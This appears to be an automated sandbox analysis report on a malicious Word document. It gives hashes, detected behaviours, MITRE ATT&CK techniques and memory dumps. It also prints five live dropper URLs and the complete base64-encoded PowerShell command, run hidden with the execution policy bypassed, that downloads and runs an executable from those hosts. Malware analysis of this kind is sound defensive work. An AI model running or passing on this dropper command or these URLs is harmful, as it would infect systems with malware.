728d0def3186dc60e0b0ae365fe750930be37151b1a1e8165a25288026dd2b16

General

Target

728d0def3186dc60e0b0ae365fe750930be37151b1a1e8165a25288026dd2b16.doc
Size

146KB
MD5

13a08d07bf9168fd0cda074234f02330
SHA1

cafb64ca399c6df7581aa40d0b47a528f7a05b11
SHA256

728d0def3186dc60e0b0ae365fe750930be37151b1a1e8165a25288026dd2b16
SHA512

4eeedfa1929883375b339e230988cecfa41a86cd75b0c821aaf860c07a0dc58afbbe86b01d6d8f808515f0d4b660f54728f0493a126628ae011a0ee97afda6f3

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://mireiatorrent.com/wp-includes/bj07f0biw9_0sj91efi-0/

exe.dropper

http://msograteful.com/codImwUJbt/

exe.dropper

http://escoder.net/cgi-bin/OmrZcAEqS/

exe.dropper

http://priyainfosys.com/products/FSrnZTOgOA/

exe.dropper

http://llona.net/bqi776dm_agvux-6816533798/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5040	3208	powershell.exe	34

Blocklisted process makes network request 4 IoCs

flow	pid	Process
21	5040	powershell.exe
23	5040	powershell.exe
24	5040	powershell.exe
30	5040	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
5060	WINWORD.EXE
5060	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
5040	powershell.exe
5040	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	5040	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
5060	WINWORD.EXE
5060	WINWORD.EXE

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
5060	WINWORD.EXE
5060	WINWORD.EXE
5060	WINWORD.EXE
5060	WINWORD.EXE
5060	WINWORD.EXE
5060	WINWORD.EXE
5060	WINWORD.EXE

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 5060 wrote to memory of 4716	5060	WINWORD.EXE	83
PID 5060 wrote to memory of 4716	5060	WINWORD.EXE	83

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\728d0def3186dc60e0b0ae365fe750930be37151b1a1e8165a25288026dd2b16.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5060
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:4716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABUADgAXwA1ADMAMAAwAD0AJwBHADIAMgAyADYAMQA5ACcAOwAkAEwANAA1ADQAMwAwACAAPQAgACcAMQAwACcAOwAkAEkANAA2ADYAMAA0ADQAPQAnAEIAMwA1ADgAXwBfADYANgAnADsAJABPADkAMQA2ADEAMwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATAA0ADUANAAzADAAKwAnAC4AZQB4AGUAJwA7ACQAdwA1AF8AMwBfADAAMQA9ACcAagAzADcANAA3ADYAJwA7ACQAZgAzADgANQA0ADYAOQAwAD0ALgAoACcAbgBlACcAKwAnAHcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABuAEUAVAAuAGAAVwBFAGIAYABDAGwASQBlAE4AVAA7ACQAVQAxADYAMQA4ADYANQAyAD0AJwBoAHQAdABwADoALwAvAG0AaQByAGUAaQBhAHQAbwByAHIAZQBuAHQALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGIAagAwADcAZgAwAGIAaQB3ADkAXwAwAHMAagA5ADEAZQBmAGkALQAwAC8AQABoAHQAdABwADoALwAvAG0AcwBvAGcAcgBhAHQAZQBmAHUAbAAuAGMAbwBtAC8AYwBvAGQASQBtAHcAVQBKAGIAdAAvAEAAaAB0AHQAcAA6AC8ALwBlAHMAYwBvAGQAZQByAC4AbgBlAHQALwBjAGcAaQAtAGIAaQBuAC8ATwBtAHIAWgBjAEEARQBxAFMALwBAAGgAdAB0AHAAOgAvAC8AcAByAGkAeQBhAGkAbgBmAG8AcwB5AHMALgBjAG8AbQAvAHAAcgBvAGQAdQBjAHQAcwAvAEYAUwByAG4AWgBUAE8AZwBPAEEALwBAAGgAdAB0AHAAOgAvAC8AbABsAG8AbgBhAC4AbgBlAHQALwBiAHEAaQA3ADcANgBkAG0AXwBhAGcAdgB1AHgALQA2ADgAMQA2ADUAMwAzADcAOQA4AC8AJwAuAHMAcABsAGkAVAAoACcAQAAnACkAOwAkAHMAMwAyADEAXwA4AD0AJwBRADkANQAyADIAMQA3ADEAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGYANgAyADcAMAAzADgAIABpAG4AIAAkAFUAMQA2ADEAOAA2ADUAMgApAHsAdAByAHkAewAkAGYAMwA4ADUANAA2ADkAMAAuAEQAbwB3AE4AbABPAEEARABmAEkATABFACgAJABmADYAMgA3ADAAMwA4ACwAIAAkAE8AOQAxADYAMQAzACkAOwAkAHoAMwAyADcANwA5ADIAMwA9ACcAWQAwADkAMwBfADgANwAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAE8AOQAxADYAMQAzACkALgBMAGUAbgBHAHQAaAAgAC0AZwBlACAAMgA2ADEANwA1ACkAIAB7ACYAKAAnAEkAbgB2AG8AJwArACcAawBlACcAKwAnAC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAE8AOQAxADYAMQAzADsAJABBADgAMAA1ADgAMgA9ACcAdgA3ADgANgA5AF8AJwA7AGIAcgBlAGEAawA7ACQASQA0ADcANABfADgAMgA1AD0AJwB6ADMAMgA1ADYAMwA1ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEwANQA4AF8ANQAyADEAPQAnAHUAXwAyADAAOAAzADYANAAnAA==
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5040

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/5040-141-0x00007FFB6E230000-0x00007FFB6ECF1000-memory.dmp

Filesize
10.8MB

Download
memory/5040-140-0x00007FFB6E230000-0x00007FFB6ECF1000-memory.dmp

Filesize
10.8MB

Download
memory/5040-139-0x0000017BD8450000-0x0000017BD8472000-memory.dmp

Filesize
136KB

Download
memory/5060-138-0x0000017795DF0000-0x0000017795DF4000-memory.dmp

Filesize
16KB

Download
memory/5060-135-0x00007FFB58B30000-0x00007FFB58B40000-memory.dmp

Filesize
64KB

Download
memory/5060-136-0x00007FFB58B30000-0x00007FFB58B40000-memory.dmp

Filesize
64KB

Download
memory/5060-134-0x00007FFB5AB90000-0x00007FFB5ABA0000-memory.dmp

Filesize
64KB

Download
memory/5060-130-0x00007FFB5AB90000-0x00007FFB5ABA0000-memory.dmp

Filesize
64KB

Download
memory/5060-133-0x00007FFB5AB90000-0x00007FFB5ABA0000-memory.dmp

Filesize
64KB

Download
memory/5060-132-0x00007FFB5AB90000-0x00007FFB5ABA0000-memory.dmp

Filesize
64KB

Download
memory/5060-131-0x00007FFB5AB90000-0x00007FFB5ABA0000-memory.dmp

Filesize
64KB

Download
memory/5060-143-0x00007FFB5AB90000-0x00007FFB5ABA0000-memory.dmp

Filesize
64KB

Download
memory/5060-144-0x00007FFB5AB90000-0x00007FFB5ABA0000-memory.dmp

Filesize
64KB

Download
memory/5060-145-0x00007FFB5AB90000-0x00007FFB5ABA0000-memory.dmp

Filesize
64KB

Download
memory/5060-146-0x00007FFB5AB90000-0x00007FFB5ABA0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads